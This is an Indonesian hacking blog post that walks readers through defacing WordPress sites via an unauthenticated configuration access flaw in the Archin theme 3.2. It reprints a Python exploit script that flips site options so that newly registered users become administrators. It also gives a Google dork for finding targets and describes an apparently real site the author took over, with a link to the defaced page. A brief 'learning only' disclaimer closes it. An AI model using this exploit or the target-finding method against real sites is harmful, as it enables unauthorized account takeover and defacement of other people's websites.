Deface WordPress Dengan Exploit Archin WordPress Theme 3.2 Unauthenticated Configuration Access Vulnerability

Deface WordPress Dengan Exploit Archin WordPress Theme 3.2 Unauthenticated Configuration Access Vulnerability - Hai Semua, selamat datang di blog Noob1t4, Pada Artikel yang kalian baca kali ini dengan judul Deface WordPress Dengan Exploit Archin WordPress Theme 3.2 Unauthenticated Configuration Access Vulnerability, kami telah mempersiapkan artikel ini dengan baik untuk kalian baca dan ambil informasi didalamnya. mudah-mudahan isi postingan yang kami tulis ini dapat kalian pahami. baiklah, selamat membaca.

Oke, langsung saja ya bro, soalnya ane buru-buru mau malem mingguan :v . Ane prakteknya di Windows, jadi yang pakek linux ngikutin aja sebisanya. Bagi yang pake windows, wajib install Python dulu. Sttelah itu, buka notepad, dan pastekan script berikut :


# Exploit Title: Archin WordPress Theme Unauthenticated Configuration Access
# Date: Sept 29, 2012
# Exploit Author: bwall (@bwallHatesTwits)
# Vendor Homepage: http://themeforest.net/user/wptitans
# Software Link: http://themeforest.net/item/archin-premium-wordpress-business-theme/239432
# Version: 3.2
# Tested on: Ubuntu
import httplib, urllib
#target site
site = target website
#path to ajax.php
url = /wp-content/themes/yvora/hades_framework/option_panel/ajax.php
def ChangeOption(site, url, option_name, option_value):
params = urllib.urlencode({'action': 'save', 'values[0][name]': option_name, 'values[0][value]': option_value})
headers = {Content-type: application/x-www-form-urlencoded, Accept: text/plain}
conn = httplib.HTTPConnection(site)
conn.request(POST, url, params, headers)
response = conn.getresponse()
print response.status, response.reason
data = response.read()
print data
conn.close()

ChangeOption(site, url, admin_email, emailmu)
ChangeOption(site, url, users_can_register, 1)
ChangeOption(site, url, default_role, administrator)
print Now register a new user, they are an administrator by default!

Save di direktori C: dengan nama archin.py (untuk memudahkan saja)

Langkah selanjutnya, dorking di google dengan dork berikut :

/wp-content/themes/vithy/hades_framework/ (kembangkan sendiri)

Setelah nemu target, coba di ctrl + u .



Lalu edit archin.py , sesuaikan dengan target diatas 😀

ganti situs.com dengan basement-pa.de

ganti archin dengan vithy

ganti akicha@jkt48-cyber.org dengan email anda

ganti shintanaomi dengan user keinginan anda. :p


Langkah selanjutnya, buka CMD, lalu ketik cd

Setelah itu, ketik lagi archin.py

Tunggu sampai proses selesai 😀



Sekarang buka http://www.basement-pa.de/wp-login.php?action=register

Masukkan data, dan cek email , maka anda akan mendapat password nya 😀



Sekarang coba login dengan user dan password yang didapat 😀



Login sukses :v

Tapi bangke ni situs gak bisa edit themes -_-

Install plugins juga gak bisa :3

jadi ya gini aja deh 😀

http://www.basement-pa.de/hacked/


Sekian dan terimakasih 😀

Thanks to : Gay MUHAMMAD TAREGH AZZIS



Sumber http://noob1t4.blogspot.com/

Artikel Menarik Lainnya:




Sekian Artikel Deface WordPress Dengan Exploit Archin WordPress Theme 3.2 Unauthenticated Configuration Access Vulnerability.
Terima kasih telah membaca artikel Deface WordPress Dengan Exploit Archin WordPress Theme 3.2 Unauthenticated Configuration Access Vulnerability, mudah-mudahan bisa memberi manfaat untuk kalian semua. Baiklah, sampai jumpa di postingan artikel lainnya.


Semua artikel tutorial di blog ini hanya untuk sebatas Pembelajaran dan Pengetahuan saja, jika kalian meyalahgunakan tutorial di blog ini, itu bukan tanggung jawab saya. Terima kasih sudah berkunjung ke blog Noob1t4, saya harap agan berkunjung kembali kesini

0 Response to "Deface WordPress Dengan Exploit Archin WordPress Theme 3.2 Unauthenticated Configuration Access Vulnerability"

Posting Komentar

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel